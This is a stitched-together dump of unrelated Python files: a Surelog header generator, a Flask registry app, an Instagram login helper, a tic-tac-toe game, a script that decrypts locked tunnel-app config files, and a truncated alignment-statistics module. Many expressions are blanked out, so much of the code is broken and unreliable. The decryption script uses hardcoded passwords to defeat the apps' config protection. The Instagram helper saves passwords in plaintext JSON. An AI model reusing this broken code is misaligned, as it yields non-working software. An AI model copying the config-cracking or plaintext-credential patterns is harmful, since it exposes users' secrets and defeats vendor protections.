#### File: Surelog/scripts/ ```python import argparse import os import re import sys _this_filepath = os.path.realpath(__file__) _default_workspace_dirpath = os.path.dirname(os.path.dirname(_this_filepath)) _type_names = set([ 'slNoType', 'slComments', 'slModule', # both Module_declaration and Interface_declaration enter and exit rules are in SV3_1aTreeShapeListener.cpp file 'slModule_declaration', 'slInterface_declaration', # Class_type exit is in SV3_1aTreeShapeListener.cpp file 'slClass_type', 'slHierarchical_identifier', 'slModuleInstance', 'slPrimitive', 'slPrimitiveInstance', 'slInterface', 'slProgram', 'slPackage', 'slChecker', 'slClass', 'slPortInst', 'slConstSelect', 'slIntConst', 'slRealConst', 'slStringConst', 'slStringLiteral', 'slConstantSelect', 'slThis', 'slGenericElementType', 'sl0', 'sl1', 'slX', 'slZ', 'slNumber', 'slText_blob', 'slCR', 'slSpaces', 'slEscapedCR', 'slVirtual', 'slExtends', 'slImplements', 'slEndfunction', 'slEndmodule', 'slEndclass', 'slEndtask', 'slEndchecker', 'slEndinterface', 'slEndprogram', 'slEndpackage', 'slEndcase', 'slEndsequence', 'slEnd', 'slEndspecify', 'slEndconfig', 'slEndproperty', 'slEndgroup', 'slEndgenerate', 'slEndprimitive', 'slEndtable', 'slEndclocking', 'slUnique', 'slUnique0', 'slPriority', 'slCase', 'slCaseX', 'slCaseZ', 'slIncPartSelectOp', 'slDecPartSelectOp', 'slColumnPartSelectOp', 'slReturnStmt', 'slBreakStmt', 'slContinueStmt', 'slAssign', 'slDeassign', 'slForce', 'slRelease', 'slForever', 'slRepeat', 'slWhile', 'slFor', 'slDo', 'slForeach', 'slElse', 'slInterface_instantiation', 'slProgram_instantiation', 'slSupply0', 'slStrong0', 'slPull0', 'slWeak0', 'slSupply1', 'slStrong1', 'slPull1', 'slWeak1', 'slHighZ1', 'slHighZ0', 'slSmall', 'slMedium', 'slLarge', 'slDot', 'slDotStar', 'slNonBlockingTriggerEvent', 'slPound_Pound_delay', 'slPortDir_Inp', 'slPortDir_Out', 'slPortDir_Inout', 'slPortDir_Ref', 'slAlwaysKeywd_Always', 'slAlwaysKeywd_Comb', 'slAlwaysKeywd_Latch', 'slAlwaysKeywd_FF', 'slEdge_Posedge', 'slEdge_Negedge', 'slEdge_Edge', 'slNumber_Integral', 'slNumber_Real', 'slNumber_1Tickb0', 'slNumber_1Tickb1', 'slNumber_1TickB0', 'slNumber_1TickB1', 'slNumber_Tickb0', 'slNumber_Tickb1', 'slNumber_TickB0', 'slNumber_TickB1', 'slNumber_Tick0', 'slNumber_Tick1', 'slNumber_1Tickbx', 'slNumber_1TickbX', 'slNumber_1TickBx', 'slNumber_1TickBX', 'slSigning_Signed', 'slSigning_Unsigned', 'slTfPortDir_Inp', 'slTfPortDir_Out', 'slTfPortDir_Inout', 'slTfPortDir_Ref', 'slTfPortDir_ConstRef', 'slIntegerAtomType_Byte', 'slIntegerAtomType_Shortint', 'slIntegerAtomType_Int', 'slIntegerAtomType_LongInt', 'slIntegerAtomType_Int', 'slIntegerAtomType_Time', 'slIntVec_TypeBit', 'slIntVec_TypeLogic', 'slIntVec_TypeReg', 'slNonIntType_ShortReal', 'slNonIntType_Real', 'slNonIntType_RealTime', 'slUnary_Plus', 'slUnary_Minus', 'slUnary_Not', 'slUnary_Tilda', 'slUnary_BitwAnd', 'slUnary_BitwOr', 'slUnary_BitwXor', 'slUnary_ReductNand', 'slUnary_ReductNor', 'slUnary_ReductXnor1', 'slUnary_ReductXnor2', 'slBinOp_MultMult', 'slBinOp_Mult', 'slBinOp_Div', 'slBinOp_Percent', 'slBinOp_Plus', 'slBinOp_Minus', 'slBinOp_ShiftRight', 'slBinOp_ShiftLeft', 'slBinOp_ArithShiftRight', 'slBinOp_ArithShiftLeft', 'slBinOp_Less', 'slBinOp_LessEqual', 'slBinOp_Great', 'slBinOp_GreatEqual', 'slInsideOp', 'slBinOp_Equiv', 'slBinOp_Not', 'slBinOp_WildcardEqual', 'slBinOp_WildcardNotEqual', 'slBinOp_FourStateLogicEqual', 'slBinOp_FourStateLogicNotEqual', 'slBinOp_WildEqual', 'slBinOp_WildNotEqual', 'slBinOp_BitwAnd', 'slBinOp_ReductXnor1', 'slBinOp_ReductXnor2', 'slBinOp_ReductNand', 'slBinOp_ReductNor', 'slBinOp_BitwXor', 'slBinOp_BitwOr', 'slBinOp_LogicAnd', 'slBinOp_LogicOr', 'slBinOp_Imply', 'slBinOp_Equivalence', 'slIncDec_PlusPlus', 'slIncDec_MinusMinus', 'slTagged', 'slQmark', 'slMatches', 'slIff', 'slNull', 'slWith', 'slImport', 'slExport', 'slPure', 'slOpenParens', 'slCloseParens', 'slAssignOp_Assign', 'slAssignOp_Add', 'slAssignOp_Sub', 'slAssignOp_Mult', 'slAssignOp_Div', 'slAssignOp_Modulo', 'slAssignOp_BitwAnd', 'slAssignOp_BitwOr', 'slAssignOp_BitwXor', 'slAssignOp_BitwLeftShift', 'slAssignOp_BitwRightShift', 'slAssignOp_ArithShiftLeft', 'slAssignOp_ArithShiftRight', 'slIncDec_PlusPlus', 'slIncDec_MinusMinus', 'slNetType_Supply0', 'slNetType_Supply1', 'slNetType_Tri', 'slNetType_TriAnd', 'slNetType_TriOr', 'slNetType_TriReg', 'slNetType_Tri0', 'slNetType_Tri1', 'slNetType_Uwire', 'slNetType_Wire', 'slNetType_Wand', 'slNetType_Wor', 'slPulldown', 'slPullup', 'slWithin', 'slThroughout', 'slFirstMatch', 'slIntersect', 'slDefault', 'slGlobal', # Properties 'slOR', 'slAND', 'slIF', 'slSTRONG', 'slWEAK', 'slNOT', 'slOVERLAP_IMPLY', 'slNON_OVERLAP_IMPLY', 'slOVERLAPPED', 'slNONOVERLAPPED', 'slS_NEXTTIME', 'slALWAYS', 'slS_ALWAYS', 'slS_EVENTUALLY', 'slEVENTUALLY', 'slUNTIL', 'slS_UNTIL', 'slUNTIL_WITH', 'slS_UNTIL_WITH', 'slIMPLIES', 'slIFF', 'slACCEPT_ON', 'slREJECT_ON', 'slSYNC_ACCEPT_ON', 'slSYNC_REJECT_ON', 'slType', ]) def _write_output(filename, content): if os.path.exists(filename): with open(filename, 'rt') as strm: orig_content = if orig_content == content: return False dirpath = os.path.dirname(filename) if not os.path.isdir(dirpath): os.makedirs(dirpath) with open(filename, 'wt') as strm: strm.write(content) strm.flush() return True def _get_implemented_methods(filepath): parse_method_name_regex = re.compile('.+::(?P<method_name>(enter|exit|visit)\w+)\s*\(.*') methods = set() with open(filepath, 'rt') as strm: for line in strm: m = parse_method_name_regex.match(line) if m: methods.add('method_name')) return methods def _generate_header(listener, antlr_definition_filepath, cpp_input_filepath, output_header_filepath): content = [ '// This file is auto-generated by', '// DO NOT EDIT', '', '/*', ' Copyright 2019 <NAME>', ' Licensed under the Apache License, Version 2.0 (the \"License\");', ' you may not use this file except in compliance with the License.', ' You may obtain a copy of the License at', '', '', '', ' Unless required by applicable law or agreed to in writing, software', ' distributed under the License is distributed on an \"AS IS\" BASIS,', ' WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.', ' See the License for the specific language governing permissions and', ' limitations under the License.', ' */', '', '/*', f' * If a method needs custom operator, write the method in {os.path.basename(cpp_input_filepath)}', ' *', f' * File: {os.path.basename(output_header_filepath)}', ' * Author: alain', ' *', ' * Created on April 16, 2017, 8:28 PM', ' */', '' ] if listener == 'Parser': content.extend([ '#ifndef SURELOG_SV3_1ATREESHAPELISTENER_H', '#define SURELOG_SV3_1ATREESHAPELISTENER_H', '#pragma once', '', '', '#include <stack>', '#include <map>', '#include <unordered_map>', '', '#include "Surelog/Utils/ParseUtils.h"', '#include "Surelog/SourceCompile/SymbolTable.h"', '#include "Surelog/Design/TimeInfo.h"', '#include "Surelog/Design/DesignElement.h"', '#include "Surelog/Design/FileContent.h"', '#include "Surelog/SourceCompile/ParseFile.h"', '#include "Surelog/SourceCompile/CompilationUnit.h"', '#include "Surelog/SourceCompile/CompileSourceFile.h"', '#include "Surelog/SourceCompile/SV3_1aTreeShapeHelper.h"', '#include "parser/SV3_1aParserBaseListener.h"', '', 'namespace SURELOG {', '', ' class SV3_1aTreeShapeListener : public SV3_1aParserBaseListener, public SV3_1aTreeShapeHelper {', ' private:', '', ' public:', ' SV3_1aTreeShapeListener(ParseFile* pf, antlr4::CommonTokenStream* tokens, unsigned int lineOffset);', ' virtual ~SV3_1aTreeShapeListener() override;', '' ]) else: content.extend([ '#ifndef SURELOG_SV3_1APPTREESHAPELISTENER_H', '#define SURELOG_SV3_1APPTREESHAPELISTENER_H', '#pragma once', '', '', '#include <regex>', '', '#include "Surelog/SourceCompile/PreprocessFile.h"', '#include "Surelog/SourceCompile/CompileSourceFile.h"', '#include "Surelog/SourceCompile/Compiler.h"', '#include "Surelog/SourceCompile/SymbolTable.h"', '#include "Surelog/SourceCompile/CompilationUnit.h"', '#include "Surelog/Design/TimeInfo.h"', '#include "Surelog/SourceCompile/SV3_1aPpTreeListenerHelper.h"', '#include "parser/SV3_1aPpParserBaseListener.h"', '', 'namespace SURELOG {', '', ' class SV3_1aPpTreeShapeListener : public SV3_1aPpParserBaseListener , public SV3_1aPpTreeListenerHelper {', '', ' public:', ' SV3_1aPpTreeShapeListener(PreprocessFile* pp, antlr4::CommonTokenStream* tokens, PreprocessFile::SpecialInstructions& instructions);', '' ]) parse_method_name_regex = re.compile('\s*virtual\s+void\s+(?P<method_name>(enter|exit|visit)\w+)\s*\(.*') sub_regex1 = re.compile('\s*virtual\s+(?P<declaration>void\s+(?P<method>(enter|exit|visit)\w+).+)\s+override\s+\{\s+\}') sub_regex2 = re.compile('(.+)(/\*ctx\*/)(.+)') implemented_methods = _get_implemented_methods(cpp_input_filepath) with open(antlr_definition_filepath, 'rt') as strm: for line in strm: line = line.strip() if line: m = parse_method_name_regex.match(line) if m: method_name ='method_name') if 'ErrorNode' in method_name: abc = 0 if method_name.startswith('exit'): type_name = method_name.replace('enter', '').replace('exit', '').replace('visit', '') _type_names.add(f'sl{type_name}') if method_name in implemented_methods: line = sub_regex1.sub(' \g<declaration> final;', line) elif method_name.startswith('exit'): method_name = method_name.replace('exit', '') line = sub_regex1.sub(f'\g<declaration> final {{ addVObject(ctx, VObjectType::sl{method_name}); }}', line) line = sub_regex2.sub(' \g<1>ctx\g<3>', line) else: line = sub_regex1.sub(' \g<declaration> final {}', line) content.append(line) content.extend([ ' };', '} // namespace SURELOG', '' ]) if listener == 'Parser': content.append('#endif // SURELOG_SV3_1ATREESHAPELISTENER_H') else: content.append('#endif // SURELOG_SV3_1APPTREESHAPELISTENER_H') _write_output(output_header_filepath, '\n'.join(content)) def _generate_VObjectTypes_h(filepath): content = [ '// This file is auto-generated by', '// DO NOT EDIT', '', '#ifndef SURELOG_VOBJECTTYPES_H', '#define SURELOG_VOBJECTTYPES_H', '#pragma once', '', '', 'enum VObjectType {', ] index = 0 for type_name in sorted(_type_names, key=lambda s: s.lower()): content.append(f' {type_name} = {index},') index += 1 content.extend([ '};', '', '#endif // SURELOG_VOBJECTTYPES_H', '' ]) _write_output(filepath, '\n'.join(content)) def _generate_VObjectTypes_cpp(filepath): content = [ '// This file is auto-generated by', '// DO NOT EDIT', '', '#include <string>', '#include "Surelog/Design/VObject.h"', '', '', 'using namespace SURELOG;', '', 'std::string VObject::getTypeName(unsigned short type) {', ' switch (type) {', ] content.extend([f' case {type_name}: return "{type_name}";' for type_name in sorted(_type_names, key=lambda s: s.lower())]) content.extend([ ' default: return "";', ' }', '}', '' ]) _write_output(filepath, '\n'.join(content)) def _generate_VObjectTypes_py_h(filepath): content = [ '// This file is auto-generated by', '// DO NOT EDIT', '', '#ifndef SURELOG_VOBJECTTYPES_PY_H', '#define SURELOG_VOBJECTTYPES_PY_H', '#pragma once', '', '', '#include <vector>', '#include <string_view>', '', 'std::vector<std::string_view> slapi_types = {', ' "# This file is automatically generated by\\n",', ' "# DO NOT EDIT\\n",', ] index = 0 for type_name in sorted(_type_names, key=lambda s: s.lower()): content.append(f' "{type_name} = {index};\\n",') index += 1 content.extend([ '};', '', '#endif // SURELOG_VOBJECTTYPES_PY_H', '' ]) _write_output(filepath, '\n'.join(content)) def _main(): parser = argparse.ArgumentParser() parser.add_argument( '--workspace-dirpath', dest='workspace_dirpath', required=False, default=_default_workspace_dirpath, type=str, help='Workspace root, either absolute or relative to current working directory.') parser.add_argument( '--output-dirpath', dest='output_dirpath', required=True, type=str, help='Output directory path, either absolute or relative to the workspace directory.') args = parser.parse_args() if not os.path.isabs(args.workspace_dirpath): args.workspace_dirpath = os.path.abspath(args.workspace_dirpath) if not os.path.isabs(args.output_dirpath): args.output_dirpath = os.path.join(args.workspace_dirpath, args.output_dirpath) args.output_dirpath = os.path.abspath(args.output_dirpath) _generate_header( 'Parser', os.path.join(args.output_dirpath, 'src', 'parser', 'SV3_1aParserBaseListener.h'), os.path.join(args.workspace_dirpath, 'src', 'SourceCompile', 'SV3_1aTreeShapeListener.cpp'), os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'SV3_1aTreeShapeListener.h')) _generate_header( 'PreProc', os.path.join(args.output_dirpath, 'src', 'parser', 'SV3_1aPpParserBaseListener.h'), os.path.join(args.workspace_dirpath, 'src', 'SourceCompile', 'SV3_1aPpTreeShapeListener.cpp'), os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'SV3_1aPpTreeShapeListener.h')) _generate_VObjectTypes_h(os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'VObjectTypes.h')) _generate_VObjectTypes_cpp(os.path.join(args.output_dirpath, 'src', 'SourceCompile', 'VObjectTypes.cpp')) _generate_VObjectTypes_py_h(os.path.join(args.output_dirpath, 'include', 'Surelog', 'API', 'VObjectTypes_py.h')) return 0 if __name__ == '__main__': sys.exit(_main()) ```
{ "source": "00-MSME/a00_registry", "score": 3 }
#### File: a00_registry/src/ ```python import logging from google.appengine.api import users from flask import Flask, redirect, flash from constants import * app = Flask(__name__) app.secret_key = FLASK_SECRET_KEY from shared import render_login_template, with_person from models import Person @app.route('/', methods=["GET"]) def home(): google_user = users.get_current_user() if google_user is not None: google_id = google_user.user_id() person = Person.with_google_id(google_id) if person is not None: return render_login_template("account.html", person=person) else: flash("choose a name and email to use with your augment00 account", "info") return redirect("/person/new") else: return render_login_template("intro.html") @app.route('/about', methods=["GET"]) def about(): google_user = users.get_current_user() if google_user is not None: google_id = google_user.user_id() person = Person.with_google_id(google_id) else: person = None return render_login_template("about.html", person=person) @app.errorhandler(500) def server_error(e): # Log the error and stacktrace. logging.exception('An error occurred during a request.') return 'An internal error occurred.', 500 ``` #### File: a00_registry/src/ ```python import random import uuid from Crypto.PublicKey import RSA from google.appengine.ext import ndb from google.appengine.api import users from base64 import b64encode, b64decode from jinja2 import Template from utilities import firebase, keys from augment_exceptions import NonUniqueException from constants import * ALPHA_NUMERIC = "abcdefghijklmnopqrstuvwxyz0123456789" def generateNewRandomAlphaNumeric(length): random.seed() values = [] for i in range(length): values.append(random.choice(ALPHA_NUMERIC)) return "".join(values) class Name(ndb.Model): pass class Email(ndb.Model): pass class GoogleId(ndb.Model): pass class Person(ndb.Model): name_key = ndb.KeyProperty(kind="Name", required=True) email_key = ndb.KeyProperty(kind="Email", required=True) google_id_key = ndb.KeyProperty(kind="GoogleId") api_key = ndb.StringProperty() @classmethod def create(cls, name, email, google_id): name_key = cls._new_unique_key(Name, name) email_key = cls._new_unique_key(Email, email) google_id_key = cls._new_unique_key(GoogleId, google_id) person_uuid = str(uuid.uuid4()) api_key = generateNewRandomAlphaNumeric(30) person = cls(name_key=name_key, email_key=email_key, google_id_key=google_id_key, id=person_uuid, api_key=api_key) person.put() return person def get_name(self): return def set_name(self, new_name): self._set_unique_attribute(Name, "name_key", new_name) def get_email(self): return def set_email(self, new_email): self._set_unique_attribute(Email, "email_key", new_email) def get_google_id(self): return @classmethod def with_email(cls, email): key = ndb.Key(Email, email) return cls.query(cls.email_key == key).get() @classmethod def with_name(cls, name): key = ndb.Key(Name, name) return cls.query(cls.name_key == key).get() @classmethod def with_google_id(cls, google_id): key = ndb.Key(GoogleId, google_id) return cls.query(cls.google_id_key == key).get() @staticmethod def _new_unique_key(attribute_class, new_value): new_attribute_key = ndb.Key(attribute_class, new_value) existing_attribute_obj = new_attribute_key.get() if existing_attribute_obj is not None: raise NonUniqueException("The value %s for %s is adready in use" % (new_value, attribute_class)) else: new_attribute_obj = attribute_class(key=new_attribute_key) new_attribute_obj.put() return new_attribute_key @ndb.transactional(xg=True) def _set_unique_attribute(self, attribute_class, attribute_key_name, new_value): current_attribute_key = getattr(self, attribute_key_name) current_value = if current_value == new_value: return new_attribute_key = self._new_unique_key(attribute_class, new_value) current_attribute_key.delete() setattr(self, attribute_key_name, new_attribute_key) self.put() def add_new_entity(self, **kwargs): return Entity.create(self.key, **kwargs) @property def entities(self): return [e for e in Entity.query(Entity.person_key == self.key).iter()] @property def configs(self): return [c for c in ConfigFile.query(ancestor=self.key).iter()] def remove(self): ndb.delete_multi(ConfigFile.query(ancestor=self.key).iter(keys_only=True)) ndb.delete_multi(Entity.query(Entity.person_key == self.key).iter(keys_only=True)) self.name_key.delete() self.email_key.delete() self.google_id_key.delete() self.key.delete() def reset_api_key(self): self.api_key = generateNewRandomAlphaNumeric(30) self.put() def add_config_file(self, name, text, path): config_uuid = str(uuid.uuid4()) config_file = ConfigFile(id=config_uuid, parent=self.key, name=name, text=text, path=path) config_file.put() return config_file name = property(get_name, set_name) email = property(get_email, set_email) google_id = property(get_google_id) class ConfigFile(ndb.Model): name = ndb.StringProperty() text = ndb.TextProperty() path = ndb.StringProperty() def as_json(self, entity): entity_uuid = template_values = entity.template_values template = Template(self.text) return { "text": template.render(uuid=entity_uuid, **template_values), "path": self.path } class Entity(ndb.Model): name = ndb.StringProperty() description = ndb.TextProperty() created = ndb.DateTimeProperty(auto_now_add=True) person_key = ndb.KeyProperty(kind="Person", required=True) public_key = ndb.TextProperty() private_key = ndb.TextProperty() serial = ndb.StringProperty() config = ndb.KeyProperty(ConfigFile, repeated=True) template_values = ndb.JsonProperty(default={}) schema = ndb.JsonProperty(default={}) def as_json(self): entity_uuid = return { "name":, "description": self.description, "created": str(self.created), "person_key":, "public_key": self.public_key, "config": [c.get().as_json(self) for c in self.config] } @property def config_files(self): configs = [c.get() for c in self.config] return configs def add_config_file(self, config_file): key = config_file.key if not key in self.config: self.config.append(key) self.put() def remove_config_file(self, config_file): key = config_file.key if key in self.config: self.config.remove(key) self.put() def regenerate_keys(self): public, private = keys.newkeys(2048) self.private_key = private.exportKey('PEM') self.public_key = public.exportKey('PEM') self.put() return self.private_key @classmethod def create(cls, person_key, **kwargs): public, private = keys.newkeys(2048) private_key = private.exportKey('PEM') public_key = public.exportKey('PEM') entity_uuid = str(uuid.uuid4()) entity = cls(id=entity_uuid, person_key=person_key, public_key=public_key, private_key=private_key, **kwargs) entity.put() return entity ``` #### File: a00_registry/src/ ```python from functools import wraps from flask import Flask, render_template, redirect, request from google.appengine.api import users from models import Person def render_login_template(template, **kwargs): user = users.get_current_user() if user: login_url = users.create_logout_url(request.url) url_linktext = 'logout' else: login_url = users.create_login_url(request.url) url_linktext = 'login' return render_template(template, login_url=login_url, url_linktext=url_linktext, **kwargs) def with_person(func): @wraps(func) def decorated_view(*args, **kwargs): google_user = users.get_current_user() if google_user is not None: google_id = google_user.user_id() person = Person.with_google_id(google_id) if person is None: return redirect("/") else: return func(*args, person=person, **kwargs) else: raise Exception("no google user in new_person") return decorated_view ```
{ "source": "00NoisyMime00/Instagram-Followers-Analyser", "score": 3 }
#### File: 00NoisyMime00/Instagram-Followers-Analyser/ ```python from getpass import getpass import json import os.path from os import path if path.exists('user.json') == False: with open('user.json', 'w') as f: details = {} details['id'] = "" details['password'] = "" json.dump(details, f) with open('user.json', 'r') as f: details = json.loads( id = details['id'] password = details['password'] def change(): id = input('Enter you instagram handle : ') password = <PASSWORD>() details={} details['id'] = id details['password'] = password with open('user.json', 'w') as f: json.dump(details, f) with open('followersList.json', 'w') as f: json.dump([], f) ```
{ "source": "00NoisyMime00/Tick-Tac-Toe", "score": 4 }
#### File: 00NoisyMime00/Tick-Tac-Toe/ ```python import os winner = -1 c=0 s='1 2 3 4 5 6 7 8 9 ' def printboard(n): ''' The function prints the board, and also the user who has the next turn. The logic of adding a symbol includes searching the number in the string 's' and placing it in place if the next character is a space. ''' global s, winner global c if n != 0: if c%2==0: symb='0' else: symb='X' i=s.find(n) if s[i+1]==' ': s=s[:i+1]+symb+s[i+2:] else: print() print() print('!!!!!Already taken!!!!!!') c-=1 sv=' | | ' sh='-----------' s3=' {} | {} | {} '.format(s[13],s[15],s[17]) s2=' {} | {} | {} '.format(s[7],s[9],s[11]) s1=' {} | {} | {} '.format(s[1],s[3],s[5]) print(sv) print(s3) print(sv) print(sh) print(sv) print(s2) print(sv) print(sh) print(sv) print(s1) print(sv) if s[13] == s[15] == s[17] : if s[13] == 'X': winner = 2 elif s[13] == '0': winner = 1 if s[7] == s[9] == s[11] : if s[7] == 'X': winner = 2 elif s[7] == '0': winner = 1 if s[3] == s[5] == s[1] : if s[1] == 'X': winner = 2 elif s[1] == '0': winner = 1 if s[13] == s[9] == s[5] : if s[13] == 'X': winner = 2 elif s[13] == '0': winner = 1 if s[1] == s[9] == s[17] : if s[1] == 'X': winner = 2 elif s[1] == '0': winner = 1 if s[1] == s[13] == s[7] : if s[1] == 'X': winner = 2 elif s[1] == '0': winner = 1 if s[3] == s[9] == s[15] : if s[3] == 'X': winner = 2 elif s[3] == '0': winner = 1 if s[11] == s[5] == s[17] : if s[11] == 'X': winner = 2 elif s[11] == '0': winner = 1 ans=['y'] if ' ' not in [s[1], s[3], s[5], s[7], s[9], s[11], s[13], s[15], s[17]]: ans = ['n'] return ans if __name__=='__main__': ans=['y'] os.system('clear') printboard(0) while ans==['y']: n=input('Choose your next position (1-9) player {} :'.format((c%2)+1)) os.system('clear') ans=printboard(n) if winner != -1: break c+=1 if winner != -1: print('WINNER IS PLAYER:'+str(winner)) else: print('DRAW!!!') ```
{ "source": "00sanoj00/Unlocker", "score": 2 }
#### File: 00sanoj00/Unlocker/ ```python from sys import stdin, stdout, stderr from argparse import ArgumentParser from pathlib import Path from base64 import b64decode from Crypto.Protocol.KDF import PBKDF2 from Crypto.Cipher import AES from Crypto.Hash import SHA256 from Crypto.Util.Padding import unpad DEFAULT_FILE_EXTENSION = '.tmt' # passwords to derive the key from PASSWORDS = { '.tut': b'<PASSWORD>', '.sks': b'<PASSWORD>!!', '.cyh': b'dyv35182!', '.sex': b'dYv35224nossas!.', '.tmt': b'<PASSWORD>', } # some utility functions def error(error_msg = 'Corrupted/unsupported file.'): stderr.write(f'\033[41m\033[30m X \033[0m {error_msg}\n') stderr.flush() exit(1) def warn(warn_msg): stderr.write(f'\033[43m\033[30m ! \033[0m {warn_msg}\n') stderr.flush() def ask(prompt): stderr.write(f'\033[104m\033[30m ? \033[0m {prompt} ') stderr.flush() return input() def human_bool_to_bool(human_bool): return 'y' in human_bool def main(): # parse arguments parser = ArgumentParser() parser.add_argument('file', help='file to decrypt') output_args = parser.add_mutually_exclusive_group() output_args.add_argument('--output', '-o', help='file to output to') output_args.add_argument('--stdout', '-O', action='store_true', help='output to stdout', default=True) args = parser.parse_args() # open file encrypted_contents = open(args.file, 'r').read() # determine the file's extension file_ext = Path(args.file).suffix if file_ext not in PASSWORDS: warn(f'Unknown file extension, defaulting to {DEFAULT_FILE_EXTENSION}') file_ext = DEFAULT_FILE_EXTENSION # split the file split_base64_contents = encrypted_contents.split('.') if len(split_base64_contents) != 3: raise ValueError('Unsupported file.') split_contents = list(map(b64decode, split_base64_contents)) # derive the key decryption_key = PBKDF2(PASSWORDS[file_ext], split_contents[0], hmac_hash_module=SHA256) # decrypt the file cipher =, AES.MODE_GCM, nonce=split_contents[1]) decrypted_contents = cipher.decrypt_and_verify(split_contents[2][:-16], split_contents[2][-16:]) # decide where to write contents if args.output: output_file_path = Path(args.output) # check if the file exists if output_file_path.exists() and output_file_path.is_file(): # check if the user agrees to overwrite it if not human_bool_to_bool(ask(f'A file named "{args.output}" already exists. Overwrite it? (y/n)')): # if user doesn't, quit exit(0) # write the contents to the file output_file = open(output_file_path, 'wb') output_file.write(decrypted_contents) elif args.stdout: # convert the config to UTF-8 config = decrypted_contents.decode('utf-8') # write it to stdout stdout.write(config) stdout.flush() if __name__ == '__main__': try: main() except Exception as err: error(err) ```
{ "source": "00sapo/ASMD", "score": 2 }
#### File: ASMD/asmd/ ```python import os import os.path import pickle import random from copy import deepcopy from random import choices, uniform from typing import List, Tuple import numpy as np from hmmlearn.hmm import GMMHMM from sklearn.preprocessing import StandardScaler, minmax_scale from .asmd import Dataset from .conversion_tool import fix_offsets from .dataset_utils import choice, filter, get_score_mat, union from .eita.alignment_eita import get_matching_notes from .idiot import THISDIR from .utils import mat_stretch NJOBS = -1 FILE_STATS = os.path.join(THISDIR, "_alignment_stats.pkl") # TODO: refactoring: most of the stuffs are repeated twice for onsets and durations class Stats(object): def __init__(self, ons_dev_max=0.2, dur_dev_max=0.2, mean_max_ons=None, mean_max_dur=None): self.dur_ratios = [] self.ons_diffs = [] self.ons_lengths = [] self.dur_lengths = [] self.means_ons = [] self.means_dur = [] self.ons_dev = [] self.dur_dev = [] self.ons_dev_max = ons_dev_max self.dur_dev_max = dur_dev_max self.mean_max_ons = mean_max_ons self.mean_max_dur = mean_max_dur self._song_duration_dev = 1 self._song_onset_dev = 1 self._song_mean_ons = 0 self._song_mean_dur = 0 self._seed = 1992 def seed(self): """ Calls `seed` on python `random` and then increments its own seed of one """ random.seed(self._seed) self._seed += 1 return self._seed def add_data_to_histograms(self, ons_diffs, dur_ratios): """ Method to add data, then you should still compute histograms """ self.ons_dev.append(np.std(ons_diffs)) self.dur_dev.append(np.std(dur_ratios)) self.means_ons.append(np.mean(ons_diffs)) self.means_dur.append(np.mean(dur_ratios)) self.ons_diffs += StandardScaler().fit_transform( ons_diffs.reshape(-1, 1)).tolist() self.dur_ratios += StandardScaler().fit_transform( dur_ratios.reshape(-1, 1)).tolist() self.ons_lengths.append(len(ons_diffs)) self.dur_lengths.append(len(dur_ratios)) def get_random_onset_dev(self, k=1): self.seed() return _get_random_value_from_hist(self.ons_dev_hist, k, max_value=self.ons_dev_max) def get_random_duration_dev(self, k=1): self.seed() return _get_random_value_from_hist(self.dur_dev_hist, k, max_value=self.dur_dev_max) def get_random_mean_ons(self, k=1): self.seed() return _get_random_value_from_hist(self.means_hist_ons, k, max_value=self.mean_max_ons) def get_random_mean_dur(self, k=1): self.seed() return _get_random_value_from_hist(self.means_hist_dur, k, max_value=self.mean_max_dur) def new_song(self): """ Prepare this object for a new song """ self.seed() self._song_duration_dev = self.get_random_duration_dev() self.seed() self._song_onset_dev = self.get_random_onset_dev() self.seed() self._song_mean_ons = self.get_random_mean_ons() self._song_mean_dur = self.get_random_mean_dur() def fill_stats(self, dataset: Dataset): """ Fills this object with data from `datasets` """ global process_ def process_(i, dataset): try: score, aligned = get_matching_scores(dataset, i) except RuntimeError: # skipping if we cannot match the notes for this score return None # computing diffs ons_diffs = score[:, 1] - aligned[:, 1] dur_ratios = (aligned[:, 2] - aligned[:, 1]) / (score[:, 2] - score[:, 1]) return ons_diffs, dur_ratios # puts in `self._data` onset and duration diffs self._data = dataset.parallel( process_, # type: ignore n_jobs=NJOBS, backend="multiprocessing") count = 0 for res in self._data: if res is not None: count += 1 ons_diffs, dur_ratios = res self.add_data_to_histograms(ons_diffs, dur_ratios) print( f"Using {count / len(self._data):.2f} songs ({count} / {len(self._data)})" ) def get_random_durations(self, aligned_dur): aligned_dur = np.asarray(aligned_dur) self.seed() new_dur_ratio = self.get_random_duration_ratio( k=len(aligned_dur)) * self._song_duration_dev + self._song_mean_dur return aligned_dur / np.abs(new_dur_ratio) def get_random_onsets(self, aligned): aligned = np.asarray(aligned) self.seed() new_ons_diff = self.get_random_onset_diff( k=len(aligned)) * self._song_onset_dev + self._song_mean_ons new_ons = np.sort(aligned + new_ons_diff) new_ons -= new_ons.min() return new_ons def get_random_offsets(self, aligned_ons, aligned_offs, new_ons): aligned_ons = np.asarray(aligned_ons) aligned_offs = np.asarray(aligned_offs) new_ons = np.asarray(new_ons) new_dur = self.get_random_durations(aligned_offs - aligned_ons) return new_ons + new_dur def get_random_onset_diff(self, k=1): pass def get_random_duration_ratio(self, k=1): pass def train_on_filled_stats(self): """ Compute all the histograms in tuples (histogram, bin_edges): self.means_hist self.ons_dev_hist self.dur_dev_hist """ self.means_hist_ons = np.histogram(self.means_ons, bins='auto', density=True) self.means_hist_dur = np.histogram(self.means_dur, bins='auto', density=True) self.ons_dev_hist = np.histogram(self.ons_dev, bins='auto', density=True) self.dur_dev_hist = np.histogram(self.dur_dev, bins='auto', density=True) class HistStats(Stats): def __init__(self, ons_max=None, dur_max=None, stats: Stats = None): super().__init__() if stats: self.__dict__.update(deepcopy(stats.__dict__)) self.ons_max = ons_max self.dur_max = dur_max def train_on_filled_stats(self): super().train_on_filled_stats() # computing onset and duration histograms self.ons_hist = np.histogram(self.ons_diffs, bins='auto', density=True) self.dur_hist = np.histogram(self.dur_ratios, bins='auto', density=True) def get_random_onset_diff(self, k=1): self.seed() return _get_random_value_from_hist(self.ons_hist, k, max_value=self.ons_max) def get_random_duration_ratio(self, k=1): self.seed() return _get_random_value_from_hist(self.dur_hist, k, max_value=self.dur_max) def __repr__(self): return str(type(self)) class HMMStats(Stats): def __init__(self, stats: Stats = None): super().__init__() if stats: self.__dict__.update(deepcopy(stats.__dict__)) n_iter = 100 # maximum number of iterations tol = 0.1 # minimum value of log-likelyhood covariance_type = 'diag' self.onshmm = GMMHMM( n_components=20, # the number of 